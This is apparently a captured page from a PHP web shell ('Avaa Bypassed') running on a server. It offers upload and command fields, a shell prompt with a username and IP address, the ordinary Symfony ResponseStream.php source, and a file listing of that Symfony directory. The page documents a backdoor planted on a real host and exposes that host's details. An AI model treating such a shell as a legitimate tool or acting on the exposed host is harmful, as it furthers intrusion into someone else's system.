[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@3.145.172.24: ~ $
<?php

/*
 * This file is part of the Symfony package.
 *
 * (c) Fabien Potencier <fabien@symfony.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Symfony\Component\HttpClient\Response;

use Symfony\Contracts\HttpClient\ChunkInterface;
use Symfony\Contracts\HttpClient\ResponseInterface;
use Symfony\Contracts\HttpClient\ResponseStreamInterface;

/**
 * @author Nicolas Grekas <p@tchwork.com>
 */
final class ResponseStream implements ResponseStreamInterface
{
    private $generator;

    public function __construct(\Generator $generator)
    {
        $this->generator = $generator;
    }

    public function key(): ResponseInterface
    {
        return $this->generator->key();
    }

    public function current(): ChunkInterface
    {
        return $this->generator->current();
    }

    public function next(): void
    {
        $this->generator->next();
    }

    public function rewind(): void
    {
        $this->generator->rewind();
    }

    public function valid(): bool
    {
        return $this->generator->valid();
    }
}

Filemanager

Name Type Size Permission Actions
AmpResponse.php File 16.52 KB 0644
AsyncContext.php File 5.47 KB 0644
AsyncResponse.php File 16.35 KB 0644
CommonResponseTrait.php File 4.97 KB 0644
CurlResponse.php File 18.75 KB 0644
HttplugPromise.php File 1.87 KB 0644
MockResponse.php File 11.78 KB 0644
NativeResponse.php File 13.38 KB 0644
ResponseStream.php File 1.12 KB 0644
StreamWrapper.php File 9.14 KB 0644
StreamableInterface.php File 1.13 KB 0644
TraceableResponse.php File 6.58 KB 0644
TransportResponseTrait.php File 10.9 KB 0644